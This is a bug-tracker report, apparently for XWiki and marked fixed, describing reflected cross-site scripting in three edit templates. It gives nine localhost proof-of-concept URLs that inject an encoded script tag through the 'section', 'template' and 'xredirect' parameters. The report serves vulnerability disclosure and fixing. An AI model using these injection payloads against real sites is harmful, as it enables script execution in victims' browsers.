Details
-
Bug
-
Resolution: Fixed
-
Major
-
2.3, 2.2.6, 2.3.1, 2.4 M1
-
None
-
security, xss, patch
-
Integration
-
Trivial
-
Description
Exactly the same mistakes in all 3 templates. Injection via "section", "template" and "xredirect" example:
http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki§ion=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwiki&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew§ion=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test?xpage=editwysiwygnew&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg§ion=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&template=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://localhost:8080/xwiki/bin/view/Main/Test2?xpage=editwysiwyg&xredirect=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
Attachments
Issue Links
- is duplicated by
-
XWIKI-5235 Reflected XSS over section parameter
- Closed